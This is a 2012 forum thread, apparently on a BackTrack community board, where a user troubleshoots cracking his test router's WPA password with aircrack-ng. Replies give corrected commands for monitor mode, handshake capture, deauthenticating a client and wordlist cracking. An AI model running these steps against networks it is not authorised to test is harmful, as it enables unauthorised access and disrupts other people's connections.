Results 1 to 4 of 4

Thread: Aircrack, Found Handshake but no luck?

  1. #1
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    1

    Default Aircrack, Found Handshake but no luck?

    Im fairly new to this but i have been trying to breach my wifi using aircrack. What is weird that i get a handshake and when i try to decode it using the wordlist even tho i know my password which is 12345678 on my test router is in there it wont find the correct password.

    Here is what i write
    airmon-ng start wlan0
    airodump-ng mon0
    airodump-ng -c 1 -w WPA1 --bssid B8:A3:86:B6:20:E5 --ivs mon0
    aireplay-ng -0 1 -e homenetwork mon0
    aircrack-ng -w /root/dekstop/wordlist.lst WPA1-01.ivs

    Were do i go wrong?

  2. #2
    Just burned his ISO str4ng3r's Avatar
    Join Date
    Jun 2012
    Posts
    10

    Default Re: Aircrack, Found Handshake but no luck?

    instead of

    aircrack-ng -w /root/dekstop/wordlist.lst WPA1-01.ivs

    use

    aircrack-ng -w /root/dekstop/wordlist.lst WPA1*.cap

  3. #3
    Just burned his ISO codekiddy's Avatar
    Join Date
    Oct 2011
    Posts
    6

    Default Re: Aircrack, Found Handshake but no luck?

    I think your last command is incorrect:
    aircrack-ng -w /root/dekstop/wordlist.lst WPA1-01.ivs
    Wpa handshake is not located inside WPA-01.ivs

    It is located inside WPA-01.cap

    Here is what you should do (with comments):
    airmon-ng start wlan0
    airodump-ng -c 1 -w WPA1 --bssid B8:A3:86:B6:20:E5 mon0 // I removed --ivs option here, ( if you use it your handshake will be incomplete )
    aireplay-ng -0 5 -a B8:A3:86:B6:20:E5 -c "client MAC address being deauthenticated" mon0 // --deauth option have more effect when targeting specific client
    aircrack-ng -w /root/dekstop/wordlist.lst *.cap // cracking files with *.cap extension. (capture files) it's the same as aircrack-ng -w /root/dekstop/wordlist.lst WPA1-01.cap
    Good luck!
    Last edited by codekiddy; 06-28-2012 at 05:05 PM.

  4. #4
    Just burned his ISO
    Join Date
    Oct 2012
    Posts
    7

    Default Re: Aircrack, Found Handshake but no luck?

    ok i had this exact same problem and i tried both the solutions on this page and they didn't work. i found the solution. I am running bt5 r2 and this normally comes with darkc0de.lst. I downloaded the some other password lists online and they came as "pw list1.txt. i changed the name to darkc0de2.lst and the problem went away. hope that helps.

Similar Threads

  1. Aircrack key found - but not connet to wireless network
    By darkman82 in forum Beginners Forum
    Replies: 1
    Last Post: 01-26-2011, 02:00 AM
  2. [aircrack-ng e iptables]: falso handshake
    By alexander021 in forum Angolo Wireless
    Replies: 2
    Last Post: 11-22-2010, 01:02 PM
  3. Aircrack-ng - WPA2 - Missing Handshake
    By Souless in forum Beginners Forum
    Replies: 3
    Last Post: 07-30-2010, 08:40 PM
  4. About BT4 Aircrack-ng no handshake FIX
    By Swisher in forum Beginners Forum
    Replies: 2
    Last Post: 02-25-2010, 08:12 PM
  5. No valid WPA handshake found
    By druggist in forum OLD Newbie Area
    Replies: 10
    Last Post: 04-07-2008, 01:13 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •